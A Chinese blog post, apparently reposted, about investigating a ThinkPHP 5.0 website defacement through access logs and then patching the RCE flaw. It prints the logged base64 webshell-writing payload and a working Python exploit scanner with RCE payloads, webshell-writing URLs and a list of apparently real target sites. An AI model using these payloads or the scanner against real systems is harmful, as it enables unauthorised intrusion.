记录一次基于ThinkPHP网站被入侵到溯源的过程

昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作

知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。

0x01 下载必要文件

首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。

0x02 日志分析

从网站首页被篡改,可知道攻击者应该拿下了网站的权限,并上传了 webshell,因此从攻击日志中查找网站非常规的访问URL记录。

发现如下的访问日志:

203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/asd.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/result.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/result.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/read.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/read.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/flye.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/flye.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/moon.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/moon.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //api.php HTTP/1.1" 301 178 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /api.php HTTP/1.1" 404 564 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lequ.php HTTP/1.1" 301 178 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lequ.php HTTP/1.1" 404 564 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lx.php HTTP/1.1" 301 178 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lx.php HTTP/1.1" 404 564 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //sb.php HTTP/1.1" 301 178 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /sb.php HTTP/1.1" 404 564 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /install/sss1.php HTTP/1.1" 404 564 "http://pay.top15.cn//install/sss1.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

看到这样的访问日志,很明显这是一个扫描器在扫描网站是否存在 webshell

查询ip:

机房扫描

可知,这是放在服务器上的扫描器

继续往下分析,时间顺序是从上往下增加的。

然后又发现一处集中扫描网站备份文件的日志记录:

117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /index.php?s=hits-show&sid=md5(1)%23&type=md5(1) HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

查询IP结果如下:

第二处攻击记录IP信息

想不到,小小的站点,攻击的人还挺多的,但是这些扫描基本都是徒劳的,网站上不存在这些内容,所以也不存在什么威胁(之后的几处地方也存在类似的扫描记录,正常访问的用户不多,倒是扫描器挺多的...⊙﹏⊙b汗)

网站的首页被改成了一串中文,那么在访问日志当中应当是存在的

在下载的网站文件/public 目录下,发现如下情况

攻击文件

index.phpi.php,乍一看,第二个文件很明显是 webshell 文件,然后到访问日志中,查找 i.php这个关键词

i.php

OK,成功定位攻击日志

很明显,攻击者在简单访问几次后,便直接使用了0day攻击,系统基于 ThinkPHP5.0,因此由最近爆出的ThinkPHP几个RCE漏洞,可知攻击者直接利用了该漏洞。

113.103.115.134 - - [15/Feb/2019:17:26:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=eval(base64_decode(%27JGYgPSBmb3BlbigiaS5waHAiLCAidyIpOw0KJHQgPSAnPD9waHAgJGEgPSBiYXNlNjRfZGVjb2RlKFwnWVhOelpYSjBcJyk7JGEoJF9SRVFVRVNUW1wnaVwnXSk7Pz4nOw0KZndyaXRlKCRmLCR0KTsNCmZjbG9zZSgkZik7%27)) HTTP/1.1" 500 7345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

定位攻击者

这个定位不是特别准确,但是也差不了多少了,真人概率 92%,可以确定攻击者使用的应该是自家的电脑。

0x03 修复工作

既然是最新的漏洞攻击,之前也挺热的,毕竟让程序员加班几次了。

关于漏洞的分析,推荐文章《ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析

通过该文章的分析,在源码中发现该程序基于 TP5.0,那么修复方法有其一,修改默认的 'var_pathinfo' => 's',把s 修改成复杂的字符串,这个在thinkphp/convention.php文件中

其二,升级官方最新版本

其三,在 thinkphp/library/think/App.php 类的 module 方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

0x04 写一个EXP:

简单写了一个 exploit

# -*- coding:utf-8 -*-
# name:tpKiller.py
# author: DYBOY
# description: ThinkPHP5 RCE的POC
# time: 2019-02-16

import requests
import re


"""
5.0.21,5.0.22:
写shell:http://example.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php @assert($_POST);?>

5.1.*:
写shell:http://example.com/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php @assert($_POST);?>

"""
# 检测存在漏洞的网址列表
target_urls =[
    'http://www.test.com',
    'http://www.meetppt.com',
    'http://www.jiyouche.com',
    'http://www.dfqy.com',
    'http://home.chegouguanjia.com',
    'http://www.aixuetuan.com'
    ]

# payload列表
poc_list = [
    '/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    '/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    '/index.php?s=index/\think\Request/input&filter=phpinfo&data=1',
    ]

def getHtml(url):
    """
    获取网页内容
    param: url
    return str
    """
    html = requests.get(url)
    html.encoding = 'utf-8'
    return html.text

def checkBug(url):
    """
    验证是否存在RCE漏洞
    param: url
    return None
    """
    for index,poc in enumerate(poc_list):
        result = getHtml(url+poc)
        if(result.find('www.php.net') > 0):
            print("当前URL:"+ url+" 存在ThinkPHP5 RCE 漏洞!\nPOC编号: "+str(index+1))
            break

def attack(urlList):
    """
    开始检测
    param:urls(<type:list>)
    return None
    """
    for url in urlList:
        checkBug(url)

# 主程序
if __name__ == '__main__':
    attack(target_urls)

0x05 总结

12月份就爆出 ThinkPHPRCE 漏洞,年底,许多公司都在忙着财务、公司年会等事情,缺少了对网站安全的一个检查维护,却不知道,在网上一些“黑客”或者“黑产团队”已经开始了批量获取webshell的入侵等违法活动,因此各大公司或是个人站长,都需要时刻关注互联网安全动态,及时做好安全防护升级工作。

原文地址:https://blog.dyboy.cn/websecurity/108.html

©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,711评论 6 493
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,079评论 3 387
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,194评论 0 349
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,089评论 1 286
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,197评论 6 385
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,306评论 1 292
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,338评论 3 412
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,119评论 0 269
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,541评论 1 306
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,846评论 2 328
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,014评论 1 341
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,694评论 4 337
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,322评论 3 318
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,026评论 0 21
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,257评论 1 267
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,863评论 2 365
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,895评论 2 351

推荐阅读更多精彩内容

  • 渗透利器——Burp的使用(一)
    Getting Started Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为...
    Eva_chenx阅读 28,668评论 0 14
  • 第六章 利用 – 低悬的果实
    作者:Gilberto Najera-Gutierrez译者:飞龙协议:CC BY-NC-SA 4.0 简介 这章...
    三月行者阅读 1,886评论 2 7
  • 后来只要安逸的我们
    近段时间,我终于又回到了南方,来到了大城市开始漫漫的找工作路途,可谓奔波,一周过去了,虽仍未找到工作,但每天都在面...
    huiiiiz阅读 156评论 0 0
  • 那些年无法忘记的人和事
    转眼18年的春节就过完了。一直以来都想写点什么,但都不知从哪里下笔。近几天没事就写点自己过去一直无法忘记的...
    夜晚星辰阅读 250评论 5 2
  • 水果
    班上的孩子们热衷于写四季的水果,真是一群水果控,喜欢吃是好事,喜欢写更是好上加好,我就搜集了几幅水果的照片...
    嘎鱼嘎鱼阅读 279评论 0 0